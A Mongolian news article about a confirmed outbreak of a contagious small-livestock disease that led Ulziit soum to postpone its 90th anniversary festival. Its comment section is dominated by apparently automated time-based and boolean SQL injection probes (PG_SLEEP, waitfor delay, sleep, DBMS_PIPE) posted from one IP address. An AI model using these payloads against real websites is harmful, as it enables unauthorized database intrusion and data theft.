Өвөрхангай аймагт Малын халдварт өвчин гарсны улмаас ойн баяр наадмаа хойшлууллаа

Aдмин / Орон нутаг

Бог малын халдварт мялзан өвчний шинж тэмдэг илэрсний улмаас зарим сум ойн баяр наадмаа хойшлуулж байна.

Тарагт сумын Туяа багийн “Бяцхан хүү” хэмээх газарт отроор яваа Төгрөг сумын харьяат малчин өрхийн бог малд гоц халдварт мялзан өвчний шинж тэмдэг илэрч шинжилгээгээр батлагджээ. Мөн Өлзийт сумын 2 дугаар багийн нутаг "Отрын дэл" гэдэг газар зусч байгаа, Баянгол сумын харьяат малчны хотонд дээрх шинж тэмдэг илэрч, лабораториор батлагдсан учраас дээрх хот айлуудын өвчтэй малыг устгах арга хэмжээ авч байна.

Үүний улмаас 7 дугаар сарын 9, 10, 11-ний өдрүүдэд түүхт 90 жилийн ойгоо тэмдэглэх байсан Өлзийт сум баяр наадмын үйл ажиллагаагаа тодорхойгүй хугацаагаар хойшлуулжээ. Гоц халдварт мялзан өвчнөөр хонь, ямаа, бөхөн, хар сүүлт, цагаан зээр, аргаль, янгир зэрэг амьтад өвчилдөг бөгөөд агаар дуслаар болон малын хэвтэр, өтөг бууцаар халдварладаг аж


Сэтгэгдэл

Зочин [@@emAtj] 2022-07-10 23:31:39

Зочин [1] 2022-07-10 23:31:38

Зочин [1'"] 2022-07-10 23:31:38

Зочин [196.196.203.214'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'] 2022-07-10 23:31:38

Зочин [EgYOAqQg')) OR 542=(SELECT 542 FROM PG_SLEEP(15))--] 2022-07-10 23:31:25

Зочин [m9iAYDvr') OR 784=(SELECT 784 FROM PG_SLEEP(15))--] 2022-07-10 23:31:13

Зочин [wSwMcgQJ' OR 276=(SELECT 276 FROM PG_SLEEP(15))--] 2022-07-10 23:31:01

Зочин [RTNVcpfc'; waitfor delay '0:0:15' -- ] 2022-07-10 23:30:49

Зочин [1 waitfor delay '0:0:15' -- ] 2022-07-10 23:30:36

Зочин [(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/] 2022-07-10 23:30:24

Зочин [0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z] 2022-07-10 23:30:12

Зочин [0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z] 2022-07-10 23:30:00

Зочин [if(now()=sysdate(),sleep(15),0)] 2022-07-10 23:29:48

Зочин [-1" OR 2+403-403-1=0+0+0+1 -- ] 2022-07-10 23:29:36

Зочин [-1' OR 2+610-610-1=0+0+0+1 or 'r7OWgaod'='] 2022-07-10 23:29:36

Зочин [-1' OR 2+598-598-1=0+0+0+1 -- ] 2022-07-10 23:29:35

Зочин [-1 OR 2+375-375-1=0+0+0+1] 2022-07-10 23:29:35

Зочин [-1 OR 2+334-334-1=0+0+0+1 -- ] 2022-07-10 23:29:34

Зочин [W4pwVnqN] 2022-07-10 23:29:34

Зочин [196.196.203.214] 2022-07-10 23:29:20

Зочин [196.196.203.214] 2022-07-10 23:29:08

Зочин [196.196.203.214] 2022-07-10 23:28:55

Зочин [196.196.203.214] 2022-07-10 23:28:54

Зочин [@@BW99y] 2022-07-10 23:28:46

Зочин [1] 2022-07-10 23:28:46

Зочин [1'"] 2022-07-10 23:28:45

Зочин [196.196.203.214'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'] 2022-07-10 23:28:45

Зочин [196.196.203.214] 2022-07-10 23:28:41

Зочин [d5nX19jp')) OR 975=(SELECT 975 FROM PG_SLEEP(15))--] 2022-07-10 23:28:32

Зочин [196.196.203.214] 2022-07-10 23:28:28

Зочин [BVycNC1T') OR 395=(SELECT 395 FROM PG_SLEEP(15))--] 2022-07-10 23:28:20

Зочин [196.196.203.214] 2022-07-10 23:28:16

Зочин [xS31wUdh' OR 244=(SELECT 244 FROM PG_SLEEP(15))--] 2022-07-10 23:28:07

Зочин [196.196.203.214] 2022-07-10 23:28:03

Зочин [I4alQQY2'; waitfor delay '0:0:15' -- ] 2022-07-10 23:27:56

Зочин [196.196.203.214] 2022-07-10 23:27:51

Зочин [1 waitfor delay '0:0:15' -- ] 2022-07-10 23:27:44

Зочин [196.196.203.214] 2022-07-10 23:27:39

Зочин [(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/] 2022-07-10 23:27:31

aiPxvpay [@@D8yAd] 2022-07-10 23:27:29

1

aiPxvpay [1] 2022-07-10 23:27:28

1

Зочин [196.196.203.214] 2022-07-10 23:27:28

aiPxvpay [1'"] 2022-07-10 23:27:28

1

aiPxvpay [196.196.203.214'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'] 2022-07-10 23:27:27

1

Зочин [0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z] 2022-07-10 23:27:19

aiPxvpay [9k95akRk')) OR 848=(SELECT 848 FROM PG_SLEEP(15))--] 2022-07-10 23:27:15

1

Зочин [0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z] 2022-07-10 23:27:07

aiPxvpay [GzcRUwmV') OR 151=(SELECT 151 FROM PG_SLEEP(15))--] 2022-07-10 23:27:02

1

Зочин [if(now()=sysdate(),sleep(15),0)] 2022-07-10 23:26:55

Зочин [196.196.203.214] 2022-07-10 23:26:52

aiPxvpay [tJhNDh1p' OR 237=(SELECT 237 FROM PG_SLEEP(15))--] 2022-07-10 23:26:50

1

Зочин [-1" OR 2+928-928-1=0+0+0+1 -- ] 2022-07-10 23:26:43

Зочин [-1' OR 2+358-358-1=0+0+0+1 or 'nk9humGu'='] 2022-07-10 23:26:43

Зочин [-1' OR 2+628-628-1=0+0+0+1 -- ] 2022-07-10 23:26:42

Зочин [-1 OR 2+567-567-1=0+0+0+1] 2022-07-10 23:26:42

Зочин [-1 OR 2+280-280-1=0+0+0+1 -- ] 2022-07-10 23:26:42

Зочин [7zgYJQb4] 2022-07-10 23:26:41

Зочин [196.196.203.214] 2022-07-10 23:26:40

aiPxvpay [ydY7wyKh'; waitfor delay '0:0:15' -- ] 2022-07-10 23:26:39

1

Зочин [196.196.203.214] 2022-07-10 23:26:29

Зочин [196.196.203.214] 2022-07-10 23:26:26

aiPxvpay [1 waitfor delay '0:0:15' -- ] 2022-07-10 23:26:25

1

Зочин [196.196.203.214] 2022-07-10 23:26:15

Зочин [196.196.203.214] 2022-07-10 23:26:14

aiPxvpay [(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/] 2022-07-10 23:26:13

1

Зочин [196.196.203.214] 2022-07-10 23:26:01

Зочин [196.196.203.214] 2022-07-10 23:26:01

aiPxvpay [0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z] 2022-07-10 23:26:00

1

Зочин [196.196.203.214] 2022-07-10 23:25:49

Зочин [196.196.203.214] 2022-07-10 23:25:49

aiPxvpay [0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z] 2022-07-10 23:25:48

1

Зочин [196.196.203.214] 2022-07-10 23:25:35

Зочин [196.196.203.214] 2022-07-10 23:25:35

Зочин [196.196.203.214] 2022-07-10 23:25:34

aiPxvpay [if(now()=sysdate(),sleep(15),0)] 2022-07-10 23:25:34

1

Зочин [196.196.203.214] 2022-07-10 23:25:34

Зочин [196.196.203.214] 2022-07-10 23:25:33

Зочин [196.196.203.214] 2022-07-10 23:25:33

aiPxvpay [-1" OR 2+152-152-1=0+0+0+1 -- ] 2022-07-10 23:25:21

1

aiPxvpay [-1' OR 2+764-764-1=0+0+0+1 or 'MgPrWo00'='] 2022-07-10 23:25:21

1

aiPxvpay [-1' OR 2+261-261-1=0+0+0+1 -- ] 2022-07-10 23:25:20

1

aiPxvpay [-1 OR 2+786-786-1=0+0+0+1] 2022-07-10 23:25:20

1

Зочин [196.196.203.214] 2022-07-10 23:25:20

aiPxvpay [-1 OR 2+810-810-1=0+0+0+1 -- ] 2022-07-10 23:25:19

1

aiPxvpay [lNJDxjMK] 2022-07-10 23:25:19

1

Зочин [196.196.203.214] 2022-07-10 23:25:08

aiPxvpay [196.196.203.214] 2022-07-10 23:25:06

1

Зочин [196.196.203.214] 2022-07-10 23:24:53

aiPxvpay [196.196.203.214] 2022-07-10 23:24:52

1

Зочин [196.196.203.214] 2022-07-10 23:24:40

aiPxvpay [196.196.203.214] 2022-07-10 23:24:38

1

aiPxvpay [196.196.203.214] 2022-07-10 23:24:26

1

Зочин [196.196.203.214] 2022-07-10 23:21:58

Зочин [196.196.203.214] 2022-07-10 23:21:45

Зочин [196.196.203.214] 2022-07-10 23:21:32

@@SCGB8

Зочин [196.196.203.214] 2022-07-10 23:21:32

1

Зочин [196.196.203.214] 2022-07-10 23:21:31

1'"

Зочин [196.196.203.214] 2022-07-10 23:21:31

1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

Зочин [196.196.203.214] 2022-07-10 23:21:17

1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

Зочин [196.196.203.214] 2022-07-10 23:21:05

Yq3VPAJ8')) OR 428=(SELECT 428 FROM PG_SLEEP(15))--

Зочин [196.196.203.214] 2022-07-10 23:20:52

Зочин [196.196.203.214] 2022-07-10 23:20:52

dRGXBd65') OR 935=(SELECT 935 FROM PG_SLEEP(15))--

Зочин [196.196.203.214] 2022-07-10 23:20:39

Зочин [196.196.203.214] 2022-07-10 23:20:38

GQsbBhWd' OR 122=(SELECT 122 FROM PG_SLEEP(15))--

aiPxvpay [196.196.203.214] 2022-07-10 23:20:34

1

Зочин [196.196.203.214] 2022-07-10 23:20:26

@@Sy5gr

Зочин [196.196.203.214] 2022-07-10 23:20:26

-1)) OR 174=(SELECT 174 FROM PG_SLEEP(15))--

Зочин [196.196.203.214] 2022-07-10 23:20:25

1

Зочин [196.196.203.214] 2022-07-10 23:20:25

1'"

Зочин [196.196.203.214] 2022-07-10 23:20:24

1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

aiPxvpay [196.196.203.214] 2022-07-10 23:20:22

1

Зочин [196.196.203.214] 2022-07-10 23:20:13

-5) OR 307=(SELECT 307 FROM PG_SLEEP(15))--

Зочин [196.196.203.214] 2022-07-10 23:20:11

1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

aiPxvpay [196.196.203.214] 2022-07-10 23:20:09

@@wgY5r

aiPxvpay [196.196.203.214] 2022-07-10 23:20:09

1

aiPxvpay [196.196.203.214] 2022-07-10 23:20:08

1'"

aiPxvpay [196.196.203.214] 2022-07-10 23:20:08

1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

Зочин [196.196.203.214] 2022-07-10 23:20:00

-5 OR 276=(SELECT 276 FROM PG_SLEEP(15))--

Зочин [196.196.203.214] 2022-07-10 23:19:58

S0iBt5Uz')) OR 854=(SELECT 854 FROM PG_SLEEP(15))--

aiPxvpay [196.196.203.214] 2022-07-10 23:19:54

1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

Зочин [196.196.203.214] 2022-07-10 23:19:47

2d2tctWU'; waitfor delay '0:0:15' --

Зочин [196.196.203.214] 2022-07-10 23:19:45

UAaSM7xo') OR 919=(SELECT 919 FROM PG_SLEEP(15))--

aiPxvpay [196.196.203.214] 2022-07-10 23:19:41

j94s48ce')) OR 573=(SELECT 573 FROM PG_SLEEP(15))--

Зочин [196.196.203.214] 2022-07-10 23:19:33

1 waitfor delay '0:0:15' --

Зочин [196.196.203.214] 2022-07-10 23:19:32

FxnMW02s' OR 929=(SELECT 929 FROM PG_SLEEP(15))--

aiPxvpay [196.196.203.214] 2022-07-10 23:19:28

PEIMWZqz') OR 552=(SELECT 552 FROM PG_SLEEP(15))--

Зочин [196.196.203.214] 2022-07-10 23:19:20

-1); waitfor delay '0:0:15' --

Зочин [196.196.203.214] 2022-07-10 23:19:19

-1)) OR 245=(SELECT 245 FROM PG_SLEEP(15))--

aiPxvpay [196.196.203.214] 2022-07-10 23:19:15

WcBMAgO4' OR 427=(SELECT 427 FROM PG_SLEEP(15))--

Зочин [196.196.203.214] 2022-07-10 23:19:06

-1; waitfor delay '0:0:15' --

Зочин [196.196.203.214] 2022-07-10 23:19:05

-5) OR 856=(SELECT 856 FROM PG_SLEEP(15))--

aiPxvpay [196.196.203.214] 2022-07-10 23:19:01

-1)) OR 99=(SELECT 99 FROM PG_SLEEP(15))--

Зочин [196.196.203.214] 2022-07-10 23:18:52

-5 OR 526=(SELECT 526 FROM PG_SLEEP(15))--

Зочин [196.196.203.214] 2022-07-10 23:18:52

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

aiPxvpay [196.196.203.214] 2022-07-10 23:18:47

-5) OR 811=(SELECT 811 FROM PG_SLEEP(15))--

Зочин [196.196.203.214] 2022-07-10 23:18:37

8XQWK8mK'; waitfor delay '0:0:15' --

Зочин [196.196.203.214] 2022-07-10 23:18:36

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

aiPxvpay [196.196.203.214] 2022-07-10 23:18:33

-5 OR 424=(SELECT 424 FROM PG_SLEEP(15))--

Зочин [196.196.203.214] 2022-07-10 23:18:24

1 waitfor delay '0:0:15' --

Зочин [196.196.203.214] 2022-07-10 23:18:23

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

aiPxvpay [196.196.203.214] 2022-07-10 23:18:20

1NJbpaW2'; waitfor delay '0:0:15' --

Зочин [196.196.203.214] 2022-07-10 23:18:11

-1); waitfor delay '0:0:15' --

Зочин [196.196.203.214] 2022-07-10 23:18:10

if(now()=sysdate(),sleep(15),0)

aiPxvpay [196.196.203.214] 2022-07-10 23:18:07

1 waitfor delay '0:0:15' --

Зочин [196.196.203.214] 2022-07-10 23:17:58

-1; waitfor delay '0:0:15' --

Зочин [196.196.203.214] 2022-07-10 23:17:58

-1" OR 2+228-228-1=0+0+0+1 --

Зочин [196.196.203.214] 2022-07-10 23:17:57

-1' OR 2+780-780-1=0+0+0+1 or 'mZzHiZjK'='

Зочин [196.196.203.214] 2022-07-10 23:17:56

-1' OR 2+132-132-1=0+0+0+1 --

Зочин [196.196.203.214] 2022-07-10 23:17:56

-1 OR 2+55-55-1=0+0+0+1

Зочин [196.196.203.214] 2022-07-10 23:17:55

-1 OR 2+836-836-1=0+0+0+1 --

Зочин [196.196.203.214] 2022-07-10 23:17:55

LyGpwhTm

aiPxvpay [196.196.203.214] 2022-07-10 23:17:54

-1); waitfor delay '0:0:15' --

Зочин [196.196.203.214] 2022-07-10 23:17:43

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

Зочин [196.196.203.214] 2022-07-10 23:17:40

1

aiPxvpay [196.196.203.214] 2022-07-10 23:17:39

-1; waitfor delay '0:0:15' --

Зочин [196.196.203.214] 2022-07-10 23:17:29

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

Зочин [196.196.203.214] 2022-07-10 23:17:27

1

aiPxvpay [196.196.203.214] 2022-07-10 23:17:26

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

Зочин [196.196.203.214] 2022-07-10 23:17:17

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

@@qwd1S [196.196.203.214] 2022-07-10 23:17:13

1 [196.196.203.214] 2022-07-10 23:17:13

1'" [196.196.203.214] 2022-07-10 23:17:12

1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||' [196.196.203.214] 2022-07-10 23:17:11

aiPxvpay [196.196.203.214] 2022-07-10 23:17:11

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

Зочин [196.196.203.214] 2022-07-10 23:17:03

if(now()=sysdate(),sleep(15),0)

1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15) [196.196.203.214] 2022-07-10 23:16:58

aiPxvpay [196.196.203.214] 2022-07-10 23:16:57

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

Зочин [196.196.203.214] 2022-07-10 23:16:49

-1" OR 2+129-129-1=0+0+0+1 --

Зочин [196.196.203.214] 2022-07-10 23:16:49

-1' OR 2+851-851-1=0+0+0+1 or '5tuA7GTH'='

Зочин [196.196.203.214] 2022-07-10 23:16:48

-1' OR 2+350-350-1=0+0+0+1 --

Зочин [196.196.203.214] 2022-07-10 23:16:48

-1 OR 2+65-65-1=0+0+0+1

Зочин [196.196.203.214] 2022-07-10 23:16:47

-1 OR 2+104-104-1=0+0+0+1 --

Зочин [196.196.203.214] 2022-07-10 23:16:47

E6QFwRdr

FKTtf1pI')) OR 774=(SELECT 774 FROM PG_SLEEP(15))-- [196.196.203.214] 2022-07-10 23:16:45

aiPxvpay [196.196.203.214] 2022-07-10 23:16:44

if(now()=sysdate(),sleep(15),0)

Зочин [196.196.203.214] 2022-07-10 23:16:35

1

WHj7lVtQ') OR 539=(SELECT 539 FROM PG_SLEEP(15))-- [196.196.203.214] 2022-07-10 23:16:32

aiPxvpay [196.196.203.214] 2022-07-10 23:16:32

-1" OR 2+224-224-1=0+0+0+1 --

aiPxvpay [196.196.203.214] 2022-07-10 23:16:31

-1' OR 2+652-652-1=0+0+0+1 or 'aKpjj15h'='

aiPxvpay [196.196.203.214] 2022-07-10 23:16:31

-1' OR 2+603-603-1=0+0+0+1 --

aiPxvpay [196.196.203.214] 2022-07-10 23:16:30

-1 OR 2+591-591-1=0+0+0+1

aiPxvpay [196.196.203.214] 2022-07-10 23:16:30

-1 OR 2+796-796-1=0+0+0+1 --

aiPxvpay [196.196.203.214] 2022-07-10 23:16:29

CuinWmXc

Зочин [196.196.203.214] 2022-07-10 23:16:22

1

gKihIGJi' OR 791=(SELECT 791 FROM PG_SLEEP(15))-- [196.196.203.214] 2022-07-10 23:16:19

aiPxvpay [196.196.203.214] 2022-07-10 23:16:17

1

@@4wLwp [196.196.203.214] 2022-07-10 23:16:09

1 [196.196.203.214] 2022-07-10 23:16:09

1'" [196.196.203.214] 2022-07-10 23:16:08

1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||' [196.196.203.214] 2022-07-10 23:16:08

-1)) OR 997=(SELECT 997 FROM PG_SLEEP(15))-- [196.196.203.214] 2022-07-10 23:16:07

aiPxvpay [196.196.203.214] 2022-07-10 23:16:04

1

1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15) [196.196.203.214] 2022-07-10 23:15:54

-5) OR 659=(SELECT 659 FROM PG_SLEEP(15))-- [196.196.203.214] 2022-07-10 23:15:53

@@O8IQ8 [196.196.203.214] 2022-07-10 23:15:51

1

1 [196.196.203.214] 2022-07-10 23:15:50

1

1'" [196.196.203.214] 2022-07-10 23:15:50

1

aiPxvpay'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||' [196.196.203.214] 2022-07-10 23:15:50

1

Er914ZqP')) OR 599=(SELECT 599 FROM PG_SLEEP(15))-- [196.196.203.214] 2022-07-10 23:15:42

-5 OR 792=(SELECT 792 FROM PG_SLEEP(15))-- [196.196.203.214] 2022-07-10 23:15:41

XfPfwPjN')) OR 201=(SELECT 201 FROM PG_SLEEP(15))-- [196.196.203.214] 2022-07-10 23:15:38

1

basiiX1g') OR 174=(SELECT 174 FROM PG_SLEEP(15))-- [196.196.203.214] 2022-07-10 23:15:29

p96YQ7u7'; waitfor delay '0:0:15' -- [196.196.203.214] 2022-07-10 23:15:29

ZCvLqCtL') OR 41=(SELECT 41 FROM PG_SLEEP(15))-- [196.196.203.214] 2022-07-10 23:15:26

1

ZEqNmFYR' OR 45=(SELECT 45 FROM PG_SLEEP(15))-- [196.196.203.214] 2022-07-10 23:15:17

1 waitfor delay '0:0:15' -- [196.196.203.214] 2022-07-10 23:15:16

jCbM6z3i' OR 136=(SELECT 136 FROM PG_SLEEP(15))-- [196.196.203.214] 2022-07-10 23:15:13

1

-1)) OR 217=(SELECT 217 FROM PG_SLEEP(15))-- [196.196.203.214] 2022-07-10 23:15:04

-1); waitfor delay '0:0:15' -- [196.196.203.214] 2022-07-10 23:15:04

HIRrftMs'; waitfor delay '0:0:15' -- [196.196.203.214] 2022-07-10 23:15:00

1

-5) OR 550=(SELECT 550 FROM PG_SLEEP(15))-- [196.196.203.214] 2022-07-10 23:14:51

-1; waitfor delay '0:0:15' -- [196.196.203.214] 2022-07-10 23:14:51

1 waitfor delay '0:0:15' -- [196.196.203.214] 2022-07-10 23:14:48

1

-5 OR 781=(SELECT 781 FROM PG_SLEEP(15))-- [196.196.203.214] 2022-07-10 23:14:39

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/ [196.196.203.214] 2022-07-10 23:14:39

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/ [196.196.203.214] 2022-07-10 23:14:36

1

GnsNZ9ao'; waitfor delay '0:0:15' -- [196.196.203.214] 2022-07-10 23:14:27

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z [196.196.203.214] 2022-07-10 23:14:27

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z [196.196.203.214] 2022-07-10 23:14:24

1

1 waitfor delay '0:0:15' -- [196.196.203.214] 2022-07-10 23:14:14

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z [196.196.203.214] 2022-07-10 23:14:14

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z [196.196.203.214] 2022-07-10 23:14:11

1

-1); waitfor delay '0:0:15' -- [196.196.203.214] 2022-07-10 23:14:03

if(now()=sysdate(),sleep(15),0) [196.196.203.214] 2022-07-10 23:14:02

if(now()=sysdate(),sleep(15),0) [196.196.203.214] 2022-07-10 23:13:59

1

-1; waitfor delay '0:0:15' -- [196.196.203.214] 2022-07-10 23:13:51

-1" OR 2+100-100-1=0+0+0+1 -- [196.196.203.214] 2022-07-10 23:13:50

-1' OR 2+599-599-1=0+0+0+1 or 'HMKcEHrE'=' [196.196.203.214] 2022-07-10 23:13:49

-1' OR 2+462-462-1=0+0+0+1 -- [196.196.203.214] 2022-07-10 23:13:49

-1 OR 2+542-542-1=0+0+0+1 [196.196.203.214] 2022-07-10 23:13:49

-1" OR 2+720-720-1=0+0+0+1 -- [196.196.203.214] 2022-07-10 23:13:48

1

-1 OR 2+30-30-1=0+0+0+1 -- [196.196.203.214] 2022-07-10 23:13:48

-1' OR 2+307-307-1=0+0+0+1 or '5LM4p2Ed'=' [196.196.203.214] 2022-07-10 23:13:48

1

2dBSGdQg [196.196.203.214] 2022-07-10 23:13:48

-1' OR 2+500-500-1=0+0+0+1 -- [196.196.203.214] 2022-07-10 23:13:47

1

-1 OR 2+947-947-1=0+0+0+1 [196.196.203.214] 2022-07-10 23:13:47

1

-1 OR 2+630-630-1=0+0+0+1 -- [196.196.203.214] 2022-07-10 23:13:47

1

hFr5riOx [196.196.203.214] 2022-07-10 23:13:46

1

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/ [196.196.203.214] 2022-07-10 23:13:39

1 [196.196.203.214] 2022-07-10 23:13:36

aiPxvpay [196.196.203.214] 2022-07-10 23:13:34

1

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z [196.196.203.214] 2022-07-10 23:13:27

1 [196.196.203.214] 2022-07-10 23:13:24

aiPxvpay [196.196.203.214] 2022-07-10 23:13:22

1

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z [196.196.203.214] 2022-07-10 23:13:13

if(now()=sysdate(),sleep(15),0) [196.196.203.214] 2022-07-10 23:13:01

-1" OR 2+325-325-1=0+0+0+1 -- [196.196.203.214] 2022-07-10 23:12:50

-1' OR 2+398-398-1=0+0+0+1 or 'eg1M9dji'=' [196.196.203.214] 2022-07-10 23:12:49

-1' OR 2+756-756-1=0+0+0+1 -- [196.196.203.214] 2022-07-10 23:12:49

-1 OR 2+198-198-1=0+0+0+1 [196.196.203.214] 2022-07-10 23:12:48

-1 OR 2+326-326-1=0+0+0+1 -- [196.196.203.214] 2022-07-10 23:12:48

rXjPyZjP [196.196.203.214] 2022-07-10 23:12:48

1 [196.196.203.214] 2022-07-10 23:12:36

1 [196.196.203.214] 2022-07-10 23:12:24

aiPxvpay [196.196.203.214] 2022-07-10 23:11:40

1

aiPxvpay [196.196.203.214] 2022-07-10 23:11:27

1

Зочин [196.196.203.214] 2022-07-10 23:11:08

1

Зочин [196.196.203.214] 2022-07-10 23:10:56

1

Зочин [196.196.203.214] 2022-07-10 23:10:54

aiPxvpay [196.196.203.214] 2022-07-10 23:10:51

1

Зочин [196.196.203.214] 2022-07-10 23:10:43

aiPxvpay [196.196.203.214] 2022-07-10 23:10:39

1

Зочин [196.196.203.214] 2022-07-10 23:09:53

Зочин [196.196.203.214] 2022-07-10 23:09:41

Зочин [196.196.203.214] 2022-07-10 22:40:06

Зочин [196.196.203.214] 2022-07-10 22:40:06

Зочин [196.196.203.214] 2022-07-10 22:40:06

Зочин [196.196.203.214] 2022-07-10 22:39:54

1

Зочин [196.196.203.214] 2022-07-10 22:39:54

1

Зочин [196.196.203.214] 2022-07-10 22:39:54

1

Зочин [196.196.203.214] 2022-07-10 22:39:54

1

aiPxvpay [196.196.203.214] 2022-07-10 22:37:59

1

aiPxvpay [196.196.203.214] 2022-07-10 22:37:59

1

aiPxvpay [196.196.203.214] 2022-07-10 22:37:57

1

aiPxvpay [196.196.203.214] 2022-07-10 22:37:57

1

aiPxvpay [196.196.203.214] 2022-07-10 22:37:57

1

Зочин [196.196.203.214] 2022-07-10 22:37:53

Зочин [196.196.203.214] 2022-07-10 22:37:53

Зочин [202.21.107.99] 2022-07-09 05:43:41

Өлзийт гэж сум угаасаа байх шаардлагагүй, Зэргэлдээ сумдад нь нэгтгэх хэрэгтэй!

Зочин [202.126.88.227] 2022-07-08 10:34:47

Отор нэрээр малаа туугаад тэнэж явдгаа болих хэрэгтэй. Дов довондоо дош дошиндоо хошгорцгоож байх нь өлзийтэй.

Зочин [66.181.161.97] 2022-07-08 15:40:54

Үнэн хэлжээ, отор нэрээр явагсад маш их муу үр дагвартай

Зочин [148.60.92.227] 2022-07-08 09:44:12

maliin haldbart ebchin hamgaalah taria tarilaga,hamyygaas hamgaalah baniad cheberleh ene byhen alga bolson yum uu?yagaad ebchin dahin dahin garaad bnaa!


286 сэтгэгдэл байна
1000 тэмдэгт оруулах үлдлээ.
Уншигчдын бичсэн сэтгэгдэлд Medee.MN хариуцлага хүлээхгүй болно. Манай сайт ХХЗХ-ны журмын дагуу зүй зохисгүй зарим үг, хэллэгийг хязгаарласан тул Та сэтгэгдэл бичихдээ бусдын эрх ашгийг хүндэтгэн үзнэ үү.
286 сэтгэгдэл байна
Уншигчдын бичсэн сэтгэгдэлд Medee.MN хариуцлага хүлээхгүй болно. Манай сайт ХХЗХ-ны журмын дагуу зүй зохисгүй зарим үг, хэллэгийг хязгаарласан тул Та сэтгэгдэл бичихдээ бусдын эрх ашгийг хүндэтгэн үзнэ үү.